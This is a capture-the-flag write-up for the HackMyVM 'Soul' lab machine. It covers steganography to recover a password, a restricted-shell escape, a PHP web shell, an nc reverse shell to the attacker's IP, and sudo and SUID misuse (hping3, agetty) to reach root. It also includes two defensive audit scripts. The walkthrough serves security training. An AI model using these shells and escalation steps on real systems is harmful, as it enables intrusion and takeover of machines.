HMV Soul Summary

2026-03-27 · 315 Words

Scope

  • Name: Soul
  • Difficulty: (4/10)
  • OS: Linux
  • IP: soul.hmv(192.168.56.108)

Foothold

There is just an image on the homepage.

❯ curl http://soul.hmv
 <img src="saint.jpg">
Figure 1: saint.jpg, Daniel in the lion's den

Then I find this image via Google Image Search; here is the Wikipedia article about it. From this image I could gather two candidate usernames, daniel and saint.

After that, I discover a hidden password within that image by steganalysis.

❯ stegseek saint.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "pass.txt".
[i] Extracting to "saint.jpg.out".
❯ cat saint.jpg.out
lionsarebigcats

Luckily, when I try SSH with those two usernames and that password, daniel works.

Privilege Escalation

daniel --> www-data

User Information
root:x:0:0:root:/root:/bin/bash
daniel:x:1000:1000:daniel,,,:/home/daniel:/usr/bin/rbash
gabriel:x:1001:1001:,,,:/home/gabriel:/bin/bash
peter:x:1002:1002:,,,:/home/peter:/bin/bash

I first use Python to get an interactive shell, since the initial user daniel is given rbash, a restricted shell.

python3 -c "import os;os.system('/bin/bash -ip')"
sudo rules
[sudo] password for daniel:
Sorry, user daniel may not run sudo on soul.
SUID files
/usr/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/sbin/agetty
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device

There is an interesting executable, agetty, but I (daniel) currently have no permission to execute it: it is setuid root and setgid peter, and only root and the peter group may run it.

daniel@soul:~$ ls -al /usr/sbin/agetty
-rwsrws--- 1 root peter 64744 Jan 10  2019 /usr/sbin/agetty (agetty)
Network
daniel@soul:~$ ss -tnlup
Netid         State          Recv-Q         Send-Q                 Local Address:Port                 Peer Address:Port
udp           UNCONN         0              0                            0.0.0.0:68                        0.0.0.0:*
tcp           LISTEN         0              128                          0.0.0.0:80                        0.0.0.0:*
tcp           LISTEN         0              128                          0.0.0.0:22                        0.0.0.0:*
tcp           LISTEN         0              128                             [::]:80                           [::]:*
tcp           LISTEN         0              128                             [::]:22                           [::]:*
Owned Files
daniel@soul:~$ find / -mount -group daniel -type f
/home/daniel/.bashrc
/home/daniel/.bash_logout
/home/daniel/.Xauthority
/home/daniel/.profile
/var/www/html/saint.jpg
/var/lib/sudo/lectured/daniel

Lastly, I go back to the web directory, since I find a useful clue in the nginx configuration.

daniel@soul:~$ grep -vE '#|^$' /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
    worker_connections 768;
}
http {
    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    types_hash_max_size 2048;
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    ssl_prefer_server_ciphers on;
    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log;
    gzip on;
    include /etc/nginx/conf.d/*.conf;
    include /etc/nginx/sites-enabled/*;
}
daniel@soul:~$ grep -vE '#|^$' /etc/nginx/sites-enabled/default
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
    location / {
        try_files $uri $uri/ =404;
    }
}
server {
    listen 80;
    listen [::]:80;
    server_name lonelysoul.hmv;
    root /var/www/html;
    index index.html;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
    }
}

Here nginx defines two server blocks, and the latter one could be used to execute PHP code.

The latter server only serves requests for the lonelysoul.hmv domain; the former looks like the handler for any other host name. So I map both names to the target's IP:

192.168.56.108 soul.hmv
192.168.56.108 lonelysoul.hmv
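As an added example (not part of the original writeup), a small defender-side check that parses an nginx site config and reports which server blocks hand `.php` requests to a FastCGI backend, together with their document root. The config text below is a constructed sample shaped like the two server blocks above, not a copy from any real host.

```python
import re

# Constructed sample shaped like the two server blocks quoted above; not from any real host.
SAMPLE_CONF = r"""
server {
    root /var/www/html;
    server_name _;
}
server {
    server_name lonelysoul.hmv;
    root /var/www/html;
    location ~ \.php$ {
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
    }
}
"""

def parse_blocks(text):
    """Minimal nginx parser: list of (block_name, directives, children) at top level."""
    tokens = re.findall(r'\{|\}|;|[^\s{};]+', re.sub(r'#.*', '', text))
    def block(i):
        directives, children, stmt = [], [], []
        while i < len(tokens):
            tok = tokens[i]
            if tok == ';':                      # end of a simple directive
                directives.append(stmt); stmt = []
            elif tok == '{':                    # nested block, named by the pending words
                (sub_dirs, sub_children), i = block(i + 1)
                children.append((' '.join(stmt), sub_dirs, sub_children)); stmt = []
            elif tok == '}':
                return (directives, children), i
            else:
                stmt.append(tok)
            i += 1
        return (directives, children), i
    return block(0)[0][1]

def php_vhosts(text):
    """[(server_name, root)] for server blocks that pass *.php to FastCGI: any PHP file
    a local user can write into that root runs as the PHP-FPM worker under that host."""
    found = []
    for name, directives, children in parse_blocks(text):
        if name != 'server':
            continue
        s = {d[0]: d[1:] for d in directives if d}
        runs_php = any('.php' in cname and any(cd[:1] == ['fastcgi_pass'] for cd in cdirs)
                       for cname, cdirs, _ in children if cname.startswith('location'))
        if runs_php:
            found.append((' '.join(s.get('server_name', ['_'])), s.get('root', [''])[0]))
    return found
```

Any root reported here that is writable by users other than the web server account (as /var/www/html is for daniel on this box) is the finding to fix.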

Then I move laterally to the www-data user with the following payload.

daniel@soul:/var/www/html$ cat shell.php
<?php system($_GET["cmd"]); ?>
❯ curl 'http://lonelysoul.hmv/shell.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
❯ curl 'http://lonelysoul.hmv/shell.php?cmd=nc%09192.168.56.1%091234%09-e%09/bin/bash'

www-data --> gabriel

www-data@soul:~/html$ sudo -l
Matching Defaults entries for www-data on soul:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on soul:
    (gabriel) NOPASSWD: /tmp/whoami

Luckily, this sudo rule already means that I'm also gabriel, since I can execute any command as that user through it.

www-data@soul:~/html$ cat /tmp/whoami
#!/bin/bash
/bin/bash -i
www-data@soul:~/html$ sudo -u gabriel /tmp/whoami
gabriel@soul:/var/www/html$ id
uid=1001(gabriel) gid=1001(gabriel) groups=1001(gabriel)
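As an added audit check (my own code, not part of the writeup), this parses `sudo -l` style output and flags rules whose command lives under a world-writable directory such as /tmp, or whose file is itself group/world-writable. The `sudo -l` text and the mode table are constructed samples; `mode_of` is an injectable stand-in for `os.stat` so the check runs offline.

```python
import os
import re
import stat

# Constructed sample in the shape of the `sudo -l` output quoted above; not real output.
SAMPLE_SUDO_L = """
User www-data may run the following commands on soul:
    (gabriel) NOPASSWD: /tmp/whoami
    (peter) NOPASSWD: /usr/sbin/hping3
"""
# Constructed mode table standing in for os.stat() so the check runs offline.
SAMPLE_MODES = {
    '/': 0o40755, '/tmp': 0o41777, '/tmp/whoami': 0o100755,
    '/usr': 0o40755, '/usr/sbin': 0o40755, '/usr/sbin/hping3': 0o100755,
}
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)')

def parse_sudo_l(text):
    """Yield (run_as, tags, command) for each rule line of `sudo -l` output."""
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            yield m['runas'], m['tags'].replace(' ', '').rstrip(':'), m['cmd']

def audit_rules(text, mode_of=lambda p: os.stat(p).st_mode):
    """Flag rules whose command sits under a world-writable directory or is itself
    group/world-writable: whoever may run the rule can replace the program first.
    The sticky bit on /tmp does not help, since the file's owner may still rewrite it."""
    findings = []
    for run_as, tags, cmd in parse_sudo_l(text):
        if not cmd.startswith('/'):
            continue  # ALL or a Cmnd_Alias; no path to check
        d = os.path.dirname(cmd)
        while d:                                # walk up to '/'
            if mode_of(d) & stat.S_IWOTH:
                findings.append((cmd, run_as, f'parent {d} is world-writable'))
                break
            d = '' if d == '/' else os.path.dirname(d)
        if mode_of(cmd) & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((cmd, run_as, 'command file is group/world-writable'))
    return findings
```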

gabriel --> peter

gabriel@soul:~$ sudo -l
Matching Defaults entries for gabriel on soul:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gabriel may run the following commands on soul:
    (peter) NOPASSWD: /usr/sbin/hping3

Woo, this one is also straightforward: the GTFOBins entry for hping3 helps me achieve this goal.

gabriel@soul:~$ sudo -u peter /usr/sbin/hping3
hping3> /bin/bash
peter@soul:/home/gabriel$ id
uid=1002(peter) gid=1002(peter) groups=1002(peter)

peter --> root

The last step is also simple: the SUID file agetty I found before can be executed by the current user, peter.

peter@soul:/home/gabriel$ agetty -l /bin/bash -o -p -a root tty

Debian GNU/Linux 10 soul tty

soul login: root (automatic login)

bash-5.0# id
uid=1002(peter) gid=1002(peter) euid=0(root) groups=1002(peter)
